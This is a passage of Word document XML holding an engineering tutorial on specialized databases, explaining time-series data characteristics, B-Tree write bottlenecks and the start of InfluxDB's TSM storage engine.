      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Specialized Databases Actually Are (The Real Engineering Problem)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D25071D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Specialized databases are not simply "databases optimized for specific use cases." That description misses the fundamental engineering insight. Specialized databases exist because </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">the data model, access patterns, and query semantics of certain problem domains are so structurally different from relational algebra that forcing them into a general-purpose RDBMS produces catastrophically poor performance, operationally </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>complex workarounds, or both — and a purpose-built storage engine, indexing strategy, and query language aligned with the domain's natural structure produces orders-of-magnitude improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E9F68" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>The general-purpose RDBMS (PostgreSQL, MySQL) is extraordinarily capable — it can store anything and query anything expressible in relational algebra. But "can store" and "stores efficiently" are different claims. Consider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A861146" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time-series data:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> A PostgreSQL table of 10 billion sensor readings with (sensor_id, timestamp, value) can be queried with SQL. But inserting 1 million readings per second, automatically expiring old data, compressing similar values, and computing rate() or deriv() functions requires table partitioning, custom retention jobs, manual compression, and application-level aggregation — each adding complexity. InfluxDB or TimescaleDB handles all of this natively, at lower latency, with better compression, and with query primitives designed for the problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0451A8FD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Graph traversal:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> A relational database can model a social network with users and friendships tables. Finding the shortest path between two users via friend-of-friend chains requires recursive CTEs with N join operations for N hops. At depth 6, a social network graph traversal in PostgreSQL is computationally intractable at scale. Neo4j's native graph storage and traversal engine makes the same query linear in the number of traversed edges — a fundamentally different algorithmic complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCCA8FB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Full-text search:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> A PostgreSQL table with a tsvector column and GIN index can do full-text search. But relevance ranking across millions of documents, multilingual analysis, faceted search, and autocomplete require features that PostgreSQL's search is not designed for. Elasticsearch's inverted index, BM25 scoring, analyzer pipeline, and aggregation framework handle these natively and at scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057B926F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Understanding specialized databases requires understanding not just their features but the </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>structural alignment between their internal data representation and the queries they serve</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> — why the internal model produces algorithmic efficiency improvements that cannot be replicated by bolting features onto a relational engine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70AD595A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="202CF1F0">
          <v:rect id="_x0000_i5958" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549D844" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part I: Time Series Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA8B3C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Time Series Data Actually Is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BC512A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Time series data is a sequence of values indexed by time — sensor measurements, application metrics, financial prices, server CPU readings, IoT telemetry. Its defining characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D82A654" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5833B7E9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Structural properties that distinguish time series from general relational data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532345DA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="0B3B9EBB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>1. Time is the primary dimension:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094519F1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   Every record has a timestamp — this is not one column among many,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B00FA42" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   it IS the primary organizing principle of the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8D894C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   Most queries filter by time range first.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D901D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1728C87D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>2. Writes are almost always appends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A0110B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   New data is nearly always more recent than existing data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BA9E3A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   Updates to historical data are rare (usually corrections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F54D8A3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   Deletes are almost always bulk (delete everything older than T)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45079638" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1AB43D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>3. High write rate with high redundancy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E817674" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   1000 sensors × 1 reading/second = 86.4M rows/day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA285D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   Values for one sensor are highly correlated over time (temperature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DB6B07" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   doesn't jump from 20°C to 200°C between readings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5ACF5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   → High compressibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E8FC70" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60290876" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>4. Read patterns are time-range centric:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2136846A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   "What was CPU usage from 2:00 to 2:30?" (range scan)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43829F6A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   "What's the average temperature per 5-minute window?" (downsampling)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052A753C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   "How fast is memory growing?" (derivative/rate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E03C76" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   "Notify me when pressure exceeds 100 PSI" (alerting)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7C6783" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089BF4F8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>5. Data has natural expiry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6211828B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   Last 7 days: full resolution (1-second granularity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C9EE07" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   Last 30 days: 1-minute granularity (downsampled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD7315" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   Last 1 year: 1-hour granularity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF4E617" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   Older: archived or deleted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2BC4B1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   High cardinality for recent, lower for historical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532586F4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B71182" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>6. Ordered by time within a series:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4727A462" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   data[t+1] always arrives after data[t]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA1C9E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   Within one sensor's data: strictly time-ordered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0888AB26" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">   → Enables sequential I/O for series access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1A8ACC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Storage Engine — How Time Series Databases Store Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4BA493" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental problem with B-Trees for time series:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF58DF7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A543285" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>B-Tree insert pattern for time series:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B22E079" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Sensor writes: (sensor_1, T1, v1), (sensor_2, T1, v2), (sensor_1, T2, v3)...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A58B9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFA9815" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  B-Tree organized by (sensor_id, timestamp):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A94687" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Insert (sensor_1, T1): find leaf for sensor_1 range → random I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14038E46" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Insert (sensor_2, T1): find leaf for sensor_2 range → different page, random I/O</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6775D61D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Insert (sensor_1, T2): find same leaf as T1 → may be in cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA409B4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6614F8D5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  At 1M inserts/second across 1000 sensors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9AF74B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Each insert targets a different part of the B-Tree (different sensor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0DD202" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    B-Tree is much larger than RAM → most inserts miss cache → disk reads per insert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263E87CC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    1M disk reads/second for inserts alone → NVMe can do ~500K → bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EC5442" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506935D4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  This is the "write amplification at high cardinality" problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42D54A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  B-Trees are read-optimized (log N lookup) — write-heavy time series needs write-optimized</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD5876" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>InfluxDB's TSM (Time-Structured Merge Tree) — the write-optimized solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37AC51" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>TSM is a variant of LSM-Tree adapted specifically for time series:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DA663C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1690D83A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>TSM write path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC3E709" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="6F83266C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>WAL (Write-Ahead Log):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565FB7E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  All writes first go to WAL (sequential append — fast)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046DC6CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Format: {series_key, timestamp, field_value}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02705887" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  series_key = "measurement,tag_set" e.g., "cpu,host=web01,region=us-east"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B00F368" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Durable immediately — crash recovery reads WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86B7BF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7143F87E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>In-memory cache:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A0FF5F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Writes also written to in-memory sorted structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671B441" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Organized by: series_key → sorted list of (timestamp, value) pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D0C29" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  When cache exceeds threshold (25MB default): flush to TSM file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6865F8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1CDC91" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>TSM file (on-disk immutable sorted file):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A46A214" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Structure optimized for time series access patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C4DFC4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
